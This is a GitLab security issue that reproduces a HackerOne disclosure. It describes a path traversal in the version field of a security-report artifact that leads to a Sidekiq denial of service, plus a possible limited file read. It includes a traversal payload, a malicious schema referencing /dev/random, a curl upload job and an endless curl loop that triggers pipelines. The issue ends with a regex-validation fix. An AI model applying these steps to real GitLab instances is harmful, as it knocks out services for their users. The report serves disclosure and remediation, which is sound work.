Path Traversal leads to DoS and Restricted File Read through Report Artifact Parsing (Affects Gitlab.com)
:warning: **Please read [the process](https://gitlab.com/gitlab-org/release/docs/-/blob/master/general/security/developer.md) on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.**
**[HackerOne report #2401952](https://hackerone.com/reports/2401952)** by `pwnie` on 2024-03-05, assigned to @ngeorge1:
[Report](#report) | [How To Reproduce](#how-to-reproduce)
## Report
##### Summary
`lib/gitlab/ci/parsers/security/validators/schema_validator.rb` contains a `File.join` that contains user controlled input (report_version):
```ruby
def schema_path
# The schema version selection logic here is described in the user documentation:
# https://docs.gitlab.com/ee/user/application_security/#security-report-validation
report_declared_version = File.join(root_path, report_version, file_name)
return report_declared_version if File.file?(report_declared_version)
```
This value can be controlled by uploading a bogus artifact file named "gl-secret-detection-report.json" with artifact type "secret_detection" and using a `version` JSON field with path traversals.
It's then passed to `JSONSchemer.schema(pathname)` and used to validate the CI scan artifact. Since we control the schema that's used, we can use `$ref`s to include external schemas. `JSONSchemer` allows file system access, though not network access unless explicitly passed as an option. I thoroughly read the JSONSchemer code for any way to escalate this (dump sensitive JSON files by referencing them using $ref) and I don't think it's possible (I could be wrong). The reason for this is that JSONSchemer is conveniently returning errors during validation and Gitlab is also parsing them and returning them to the user:
```ruby
schema_validation_errors = schema.validate(report_data).map { |error| JSONSchemer::Errors.pretty(error) }
```
This means if we could reference a sensitive JSON file and somehow get the validation to fail and include the **values** of the JSON file we'd be golden. Though the JSONSchemer code has a very short list of what i can return:
```ruby
def pretty(error)
data_pointer, type, schema = error.values_at('data_pointer', 'type', 'schema')
location = data_pointer.empty? ? 'root' : "property '#{data_pointer}'"
case type
when 'required'
keys = error.fetch('details').fetch('missing_keys').join(', ')
"#{location} is missing required keys: #{keys}"
when 'null', 'string', 'boolean', 'integer', 'number', 'array', 'object'
"#{location} is not of type: #{type}"
when 'pattern'
"#{location} does not match pattern: #{schema.fetch('pattern')}"
when 'format'
"#{location} does not match format: #{schema.fetch('format')}"
when 'const'
"#{location} is not: #{schema.fetch('const').inspect}"
when 'enum'
"#{location} is not one of: #{schema.fetch('enum')}"
else
"#{location} is invalid: error_type=#{type}"
end
```
`schema` would be the file we are referencing (any sensitive JSON file we want to leak), though since it obviously isn't a schema it's very hard to get anything useful from these errors. Though there is a vast array of JSON files on a given Omnibus installation many being log files that we probably can control and hence do something interesting.
```
root@gitlab:/# find . -name '*.json' 2>/dev/null | wc -l
913
```
Though I find that too painstakingly boring to pursue so I'll just leave it to you guys to decide whether or not this constitutes a file read at all.
The real issue I discovered is being able to hang a rails process and consume lots of ram rapidly:
```
.read(name, [length [, offset]][, opt]) ⇒ String
Opens the file, optionally seeks to the given offset, then returns length bytes (defaulting to the rest of the file). #read ensures the file is closed before returning.
```
By supplying `/dev/random` as the target path. I've seen people rewarded pretty big bounties for server side ReDoS so that's why I decided to report this.
e.g. https://gitlab.com/gitlab-org/gitlab/-/issues/416225
##### Steps to reproduce
1. Configure an Omnibus Gitlab instance with an Ultimate license
2. Create a project
3. Ensure the Gitlab instance has shared runners available or configure a runner for the project
4. Ensure the runner can handle more than one build at a time (/etc/gitlab-runner/config.toml set concurrent = 10)
5.1 Edit the `.gitlab-ci.yml` file in your newly created project to:
```
bogus_artifact:
script: |
curl -X POST -v -F "file=[@]gl-secret-detection-report.json" "YOUR_GITLAB_INSTANCE_URL/api/v4/jobs/$CI_JOB_ID/artifacts?artifact_format=raw&artifact_type=secret_detection&token=$CI_JOB_TOKEN"
```
5.2 Replace `YOUR_GITLAB_INSTANCE_URL` with your Gitlab instance URL
6.1 Create a file locally and name it `secret-detection-report-format.json` and set the contents to `{"$ref": "/dev/random"}`
6.2 Create a new issue in the project and upload the file in a comment
7. Calculate the hashed path of the uploaded file by calculating the SHA2 hash of the project ID (numeric ID like 34)
8. Construct the hashed path by taking the first 2 characters of the hash as the first directory, the second 2 characters as the second directory and the entire hash as the third, example is below. Then take the secret of the file you uploaded (copy the link URL in the comments and then copy just the 32 hex part of it) and append it to the constructed path so far: `4e/07/4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce/725cc8b62466087c472932f7ce4b96de`
9. Create a file in your new project with the following contents named `gl-secret-detection-report.json` and replace `YOUR_FULL_HASH_PATH` with the full path you just constructed :
```
{"version": "../../../../../../../../../../../../../../../../../../../../../../../../../var/opt/gitlab/gitlab-rails/uploads/[@]hashed/YOUR_FULL_HASH_PATH"}
```
10. Go to settings/ci_cd in your project (settings -> CI/CD), look for Pipeline trigger tokens, add new token, copy the token and save it
11. Execute the following command replacing the placeholders appropriately:
```
while true; do curl -X POST \
--fail \
-F token=YOUR_PIPELINE_TOKEN \
-F ref=main \
http://YOUR_GITLAB_INSTANCE/api/v4/projects/YOUR_PROJECT_ID/trigger/pipeline; done
```
12. This should generate many pipelines that are then handled by the runners configured for the project. If you properly configured the runner or runners to run multiple builds at once, you should see an increase in memory usage on your Gitlab instance once the pipelines are completed. This is due to `/dev/random` being read during the artifact parsing service.
13. To verify that this is indeed crashing sidekiq (artifact parsing is ran as a worker after a pipeline is complete), you can do:
```
cat sidekiq/current | grep -i terminate
{"severity":"INFO","time":"2024-03-05T04:06:53.471Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:08:56.919Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:16:05.432Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:17:28.958Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:18:52.534Z","message":"A worker terminated, shutting down the cluster"}
{"severity":"INFO","time":"2024-03-05T04:25:56.008Z","message":"A worker terminated, shutting down the cluster"}
```
or obviously just view system resource usage rapidly increase then decrease when the sidekiq process is killed along with any jobs being handled.
14. Since this kills sidekiq clusters, this means you can disrupt any services being ran and to be ran. Essentially a sidekiq DoS. This makes Gitlab unusable.
##### Impact
DoS of Gitlab instance sidekiq clusters
##### Environment
GitLab Enterprise Edition v16.7.3-ee Omnibus Package
#### Impact
DoS of Gitlab instance sidekiq clusters
## How To Reproduce
Please add [reproducibility information] to this section:
1.
1.
1.
[reproducibility information]: https://about.gitlab.com/handbook/engineering/security/#reproducibility-on-security-issues
## Implementation
1. Add regex verification for `report_version` to `Gitlab::Ci::Parsers::Security::Validators`. Copy over [schema format](https://gitlab.com/gitlab-org/security-products/security-report-schemas/-/blob/e3d280d7f0862ca66a1555ea8b24016a004bb914/src/security-report-format.json#L151) for consistency
issue